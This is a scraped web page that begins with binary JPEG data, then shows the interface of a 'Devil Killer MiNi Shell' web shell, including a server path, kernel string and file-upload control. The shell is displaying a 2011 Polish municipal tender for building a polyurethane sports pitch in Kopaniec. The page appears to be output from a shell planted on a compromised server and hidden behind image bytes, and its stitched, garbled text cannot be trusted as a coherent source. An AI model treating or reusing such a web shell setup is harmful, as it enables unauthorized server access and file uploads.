JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110417/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110417/117159-N-2011.html

<p class="kh_header"><b>Stara Kamienica: Budowa wielofunkcyjnego boiska sportowego w Kopańcu</b><br>
<b>Numer ogłoszenia: 117159 - 2011; data zamieszczenia: 17.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stara Kamienica , Stara Kamienica 41, 58-512 Stara Kamienica, woj. dolnośląskie, tel. 75 75 14 337, faks 75 75 14 337.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.new.bazagnim.pl/bip_stara_kamienica</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa wielofunkcyjnego boiska sportowego w Kopańcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem  zamówienia jest  budowa wielofunkcyjnego boiska sportowego w Kopańcu
o wymiarach 26* 44 m , na którym zlokalizowane zostały:
boisko do piłki ręcznej o wym. 20*40 m;
dwa  boiska do koszykówki , każde o wym.24*12m;
boisko do siatkówki, jedno pole o wym. 18*9 m .

Boisko o ogólnej powierzchni  1144 m2  i powierzchni pół gry 848 m2  zlokalizowane jest  na  terenie Szkoły Podstawowej , działka oznacz. goedez. Nr 774.

W 2010 r. wykonano niwelacje terenu, drenaż i podbudowę przygotowując płytę boiska do położenia nawierzchni i ogrodzenia.

W 2011 r. po uzyskaniu środków zewnętrznych  z Unii Europejskiej w ramach Programu
Rozwoju Obszarów Wiejskich na lata 2007- 2013 - Europejski Fundusz Rolny na rzecz Rozwoju
Obszarów Wiejskich _ Europa Inwestująca w Obszary Wiejskie _ działanie 4.1_ 413 Wdrażanie
lokalnych strategii rozwoju, zdecydowano się na zmianę nawierzchni  z nawierzchni typu                 _ sztuczna trawa _  na _nawierzchnie poliuretanową_
Całość zadania realizowana jest w oparciu o Projekt Zagospodarowania Terenu i STWOiR

2.	 Zakres  rzeczowy:  

a.	-  sprawdzenie stanu nawierzchni , ewentualne  poprawienie i zagęszczenie wykonanej w 2010 r. - zgodnie z Projektem Zagospodarowania Terenu oznaczonym w dokumentacji opisującej przedmiot zamówienia jako 3 -  podbudowy wraz z drenażem

-  sprawdzenie zachowania spadków poprzecznych i podłużnych w granicach 0,4 % do 1,0 %


b.	wykonanie nawierzchni poliuretanowej boiska wielofunkcyjnego - 1144m2
            
Technologia typu NATRYSK - na podbudowie przepuszczalnej instaluje się warstwę przepuszczalną dla wody i warstwę stabilizującą typu ET o grubości min. 30 mm.  Następnie warstwę gr. 10-11 mm z granulatu SBR, następnie warstwę natrysku _mieszanka granulatu EPDM zmieszana z PU_ o grubości 2-3mm.

Linie boisk - malowane w kolorach wyróżniających poszczególne boiska

c.	dostawa i montaż wyposażenie boisk 

 wyposażenie do piłki koszykowej    - 2 komplety 

- konstrukcja do koszykówki jednosłupowa, z wysięgnikiem,  malowana proszkowo
  lub cynkowana ogniowo,  montowana na stałe w podłożu - w tulejach 	           - 4 sztuki                
- mechanizm regulacji wysokości 					                       	- 4 sztuki
- tablica do koszykówki epoksydowa o wym. 105 x 180cm				- 4 sztuki
           - obręcz do koszykówki wzmocniona -uchylna , siatka do obręczy łańcuchowa 
                - cynkowana,   minimum  8-zaciskowa                                                                         - 4 sztuki	  
	wyposażenie  do piłki siatkowej     - 1 komplet 

- słupki do siatkówki aluminiowe- przenośne ,  o profilu owalnym i wzmocnione
  wewnętrznie, wielofunkcyjne z płynną regulacją wysokości  _badminton, 
  tenis, siatkówka_, z urządzeniem naciągowym, z osłonami ochronnymi             - 2 sztuki   
          
  Mocowanie słupków - przenośne , w tulejach osadzonych w podłożu + dekle maskujące tuleje   _po wyjęciu słupków_.

  Urządzenie naciągowe: zewnętrzne z osłoniętą profilem aluminiowym -śrubą naciągu siatki
  i hakiem zaczepowym
			                        
      -  siatka  bezwęzłowa,  z polipropylenu o wysokiej wytrzymałości, O 3 mm , z  linką  stalową  ,      z górną i dolną  listwą wzmacniającą                                                                  - 1 sztuka  
                                                                                                
                                                                   
      - stanowisko sędziowskie do siatkówki z mechaniczną regulacja wysokości 
   podestu i kółkami ułatwiającymi transport                                                          - 1 sztuka  

	wyposażenie  do piłki ręcznej     - 1 komplet 

-  bramki o wymiarach  3*2 m , mocowane  czteropunktowo na stałe w podłożu-
   w tulejach,  stalowe, malowane proszkowo lub cynkowane ogniowo, 
   profile zamknięte    								         - 2 sztuki   
- siatka o silnym, grubym splocie z polipropylenu                                                 -  2 sztuki   

d.	wykonanie ogrodzenia terenu  
    					
_    ogrodzenie wysokości 4 m    -  2 * 44 mb       
              w tym:   brama wjazdowa  o wym. w świetle  2,50* 2,50 m   - 1 szt.
                furtka o wym. w świetle                     1,10* 2,00 m   - 1 szt. 


	
  ogrodzenie systemowe wykonane z siatki stalowej powlekanej PCV, z drutu  ocynkowanego O 2,2 mm  rozciągniętej na słupkach  stalowych  malowanych proszkowo w kolorze siatki , krawędź oczka  maksymalnie 60mm.

     Jako rozwiązanie równoważne dopuszcza się wykonanie ogrodzenia  w systemie z siatką ocynkowaną  min. O  4mm  i_lub  z prostokątnym wymiarem oczka 50* 100 mm. 

_    ogrodzenie wysokości 6 m    -  2 * 26  mb    
   systemowe, wykonane  w formie  piłkochwytu  wyłapującego piłki , z siatki polipropylenowej - bezwęzłowej o   wysokiej wytrzymałości , wypełnionej liną drucianą,       o krawędzi oczka  maksymalnie 60mm.
  
Ogrodzenie z siatki stalowej i z siatki polipropylenowej musi być wykonane w tym samym systemie , z zachowaniem tej samej kolorystyki oraz połączeniem styków dwóch rodzajów siatek w sposób estetyczny i  uniemożliwiający ich szybkie i łatwe _rozpięcie_.
              
e.	dostawa i montaż koszy na śmieci   -  4 sztuki.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>popartych należytym wykonaniem w okresie ostatnich 5
lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w
tym okresie, robót budowlanych polegających na budowie boisk sportowych (CPV 45.21.22.21-1), w tym:   co najmniej trzech boisk z nawierzchnią poliuretanową 

Wykonawcy zobowiązani są przedłożyć wykaz wykonanych robót budowlanych, o których
mowa wyżej, sporządzony według wzoru stanowiącego Załącznik Nr 4 do IDW.
W wykazie należy podać rodzaj robót i wartości umowne, daty i miejsca ich wykonania oraz
załączyć dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.




W przypadku wykazania wartości wykonanych robót w walutach innych niż PLN - należy podać
kwotę w PLN , przeliczając kwotę wartości wykonanych robót rozliczanych w innych walutach na
PLN wg kursu danej waluty, ogłaszanego przez Narodowy Bank Polski na dzień 31.03. 2011 r.
Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów,
niezależnie od charakteru prawnego łączących go z nimi stosunków.
Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych
zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia
- Załącznik Nr 7 do IDW. przy czym- jeżeli dotyczy to wiedzy i doświadczenia - podmiot udostępniający wiedzę i doświadczenie
tj. elementów niezbywalnych wykonawcy, musi wystąpić przy realizacji wybranej części zamówienia lub całego przedmiotu zamówienia w charakterze podwykonawcy.

W przypadku wspólnego ubiegania się wykonawców o udzielenie wybranej części zamówienia
lub całego przedmiotu zamówienia oceniana będzie ich łączna wiedza i doświadczenie- w tym celu
dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich
wykazywać będą spełnianie warunku.

Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia wraz z ofertą złoży lub złożą oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1
u.p.z.p.) - Załącznik Nr 2 do IDW

    
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>należy  wskazać do uczestnictwa w wykonaniu niniejszego zamówienia  
Kierownika Budowy posiadającego :

o  co najmniej trzy (3) lata doświadczenia zawodowego na stanowisku kierownika budowy, w tym co   najmniej przy realizacji dwóch  nawierzchni poliuretanowych ,

o uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej,

o  ważny na dzień upływu terminu składania ofert dokument potwierdzający przynależność do   właściwej Izby Inżynierów Budownictwa.
 
Przez wymagany minimalny okres doświadczenia zawodowego należy rozumieć łączną ilość miesięcy przepracowanych na stanowisku kierownika budowy .

Do minimalnego okresu doświadczenia zawodowego na stanowisku kierownika budowy nie sumuje się okresu zatrudnienia danej osoby na innych budowach w tym samym czasie .
Przez wymagany okres doświadczenia zawodowego należy rozumieć okres od daty uzyskania
uprawnień budowlanych do daty ukazania się ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych .

Jeżeli wskazana wyżej osoba jest obywatelem państw członkowskich Unii Europejskiej           i nabyła w tych państwach, poza granicami Rzeczypospolitej Polskiej, kwalifikacje zawodowe do wykonywania samodzielnych funkcji w budownictwie, mając na względzie obowiązujące w Polsce przepisy prawa krajowego (art. 12 pkt 7 w zw. z art. 12 a Prawa budowlanego), wymagane będzie od tej osoby uznanie jej kwalifikacji zawodowych oraz wstąpienie do właściwej polskiej izby samorządu zawodowego. Postępowanie w sprawie uznania kwalifikacji zawodowych odbywa się na podstawie ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394).

 Dysponowanie osobą wymienioną powyżej , należy traktować jako minimalne wymagania
Zamawiającego w zakresie dotyczącym nadzoru technicznego i nie wyczerpuje to całości personelu jakim wykonawca winien dysponować do rzetelnego wypełnienia zobowiązań wynikajacych z realizacji zamówienia. 

Na potwierdzenie spełniania powyższych warunków Wykonawcy są zobowiązani przedstawić:

1)	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności osobę odpowiedzialną za kierowanie robotami budowlanymi  wraz z informacjami na temat jej kwalifikacji zawodowych, doświadczenia  i wykształcenia , a dla pracowników pozostałych - fizycznych , niezbędnych do wykonania zamówienia- zakresu wykonywanych przez nich czynności.

W wykazie należy zawrzeć informację o podstawie dysponowania tymi osobami ( tj.
kierownikiem budowy oraz pracownikami fizycznymi )  Załącznik Nr 5 do IDW .

2) Oświadczenie, że osoba , która będzie uczestniczyć w wykonywaniu zamówienia , o której mowa w pkt. 1.3) posiada wymagane uprawnienia budowlane wydane zgodnie z przepisami ustawy z 07.07.1994 r. Prawa budowlanego - Załącznik Nr 6 do IDW.
Wykonawca może polegać na osobach zdolnych do wykonania niniejszego zamówienia lub zdolnościach finansowych innych podmiotów,
niezależnie od charakteru prawnego łączących go z nimi stosunków.
Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych
zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia
- Załącznik Nr 7 do IDW. przy czym- jeżeli dotyczy to wiedzy i doświadczenia - podmiot udostępniający wiedzę i doświadczenie
tj. elementów niezbywalnych wykonawcy, musi wystąpić przy realizacji wybranej części zamówienia lub całego przedmiotu zamówienia w charakterze podwykonawcy.
W przypadku wspólnego ubiegania się wykonawców o udzielenie wybranej części zamówienia
lub całego przedmiotu zamówienia oceniany będzie ich  łączny
potencjał techniczny i kadrowy - w tym celu
dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich
wykazywać będą spełnianie warunku.

Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia wraz z ofertą złoży lub złożą oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1
u.p.z.p.) - Załącznik Nr 2 do IDW

    
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>poparta posiadaniem

a) środków finansowych lub zdolności kredytowej lub środków finansowych i zdolności kredytowej
- w wysokości co najmniej 100 000 PLN 

b) opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego ubezpieczenie
od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości stanowiącej co najmniej równowartość ceny ofertowej za wykonanie
przedmiotu zamówienia.

Do przedłożenia polisy lub innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej zostanie wezwany wykonawca , którego oferta uznana zostanie za najkorzystniejszą - przed podpisaniem umowy.

Wykonawca może polegać na  zdolnościach finansowych innych podmiotów,
niezależnie od charakteru prawnego łączących go z nimi stosunków.
Wykonawca w takiej sytuacji jest zobowiązany udowodnić Zamawiającemu , iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych
zasobów na okres korzystania z nich przy wykonywaniu niniejszego zamówienia
- Załącznik Nr 7 do IDW. przy czym- jeżeli dotyczy to środków finansowych  - od podmiotu
udostepniającego zasoby wymagane jest złożenie oświadczenia o dysponowaniu takimi środkami,
potwierdzonego informacją z banku lub spółdzielczej kasy oszczędnościowo -kredytowej,              w których podmiot udostępniający posiada rachunek, o wysokości posiadanych przez niego środków finansowych lub jego zdolności kredytowej, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu do składania ofert.  W przypadku wspólnego ubiegania się wykonawców o udzielenie wybranej części zamówienia
lub całego przedmiotu zamówienia oceniany będzie  łączna sytuacja ekonomiczna i finansowa - w tym celu
dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich
wykazywać będą spełnianie warunku.

Wykonawca lub wykonawcy ubiegający się wspólnie o udzielenie zamówienia wraz z ofertą złoży lub złożą oświadczenie o spełnieniu warunków udziału w postępowaniu ( art.22 ust. 1
u.p.z.p.) - Załącznik Nr 2 do IDW

    
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana na podstawie dokumentów według formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) certyfikat lub deklaracja zgodności z normą  PN-EN 14877:2008       lub 
aprobata techniczna ITB              lub 
rekomendacja techniczna ITB     lub 
wyniki badań specjalistycznego laboratorium potwierdzające parametry oferowanej     nawierzchni np. Labosport          lub   
dokument równoważny,

b)	 karta techniczna oferowanej nawierzchni, potwierdzona przez jej producenta,

c)	 atest PZH   dla oferowanej nawierzchni       lub         równoważny,

d)	 autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy
na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta na tą nawierzchnię.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający  przewiduje możliwość zmiany zawartej  umowy w przypadku :

a)	zmiany kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu zamówienia na osobę (y) spełniającą (e) co najmniej warunki podmiotowe określone w 
Cz.I. IDW, zmiana lub konieczność  dodatkowego wprowadzenia na plac budowy - podwykonawcy,
b)	rezygnacji z wykonania pełnego zakresu rzeczowego objętego zamówieniem w przypadku zaistnienia  okoliczności, w których zbędne będzie wykonanie danej części zamówienia , wraz      z jednoczesnym związanym z tym obniżeniem wynagrodzenia, w oparciu o dostarczony kosztorys ofertowy  przed podpisaniem umowy,   
c)	wprowadzenia robót zamiennych podczas realizacji umowy wynikających z rzeczywistych warunków występujących w trakcie realizacji prac - nie powodujących zmian  w wysokości umownej ceny wpisanej do umowy,
d)	zmiana zakresu rzeczowego umowy  w części niezbędnej do prawidłowego wykonania zamówienia, przy czym konieczna do wykonania praca nie stanowi zamówienia dodatkowego     w rozumieniu przepisów u.p.z.p. i nie spowoduje zmiany  w wysokości umownej ceny  wpisanej do umowy,

e)	wystąpienia wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających   
wykonanie robót zgodnie z zasadami wiedzy technicznej, obowiązującymi przepisami                    i warunkami technologicznymi określonymi dla robót, które miałyby być wykonane w tych warunkach;  konieczność zrealizowania zamówienia przy zastosowaniu innych rozwiązań 
technicznych, technologicznych lub materiałowych niż wskazane w Dokumentacji projektowej      w sytuacji, gdyby zastosowanie dotychczasowych rozwiązań groziło nie wykonaniem lub wadliwym  wykonaniem projektu - dotyczy  możliwości  wydłużenia terminu realizacji zakończenia i_lub zmiany wynagrodzenia na zasadzie  określonej w punkcie b).

2. Zmiany umowy nie wymaga: zmiana danych teleadresowych, zmiana osób wskazanych do   kontaktów między stronami umowy, zmiana danych związanych z obsługą administracyjno-organizacyjną umowy  (np. zmiana rachunku bankowego). 

3. O interpretacji zdarzenia _siły wyższej_ i ewentualnym uznaniu przedłużenia terminu wykonania robót  z tego powodu, będzie decydował Wójt Gminy Stara Kamienica , po złożeniu pisemnego wniosku Wykonawcy</p>
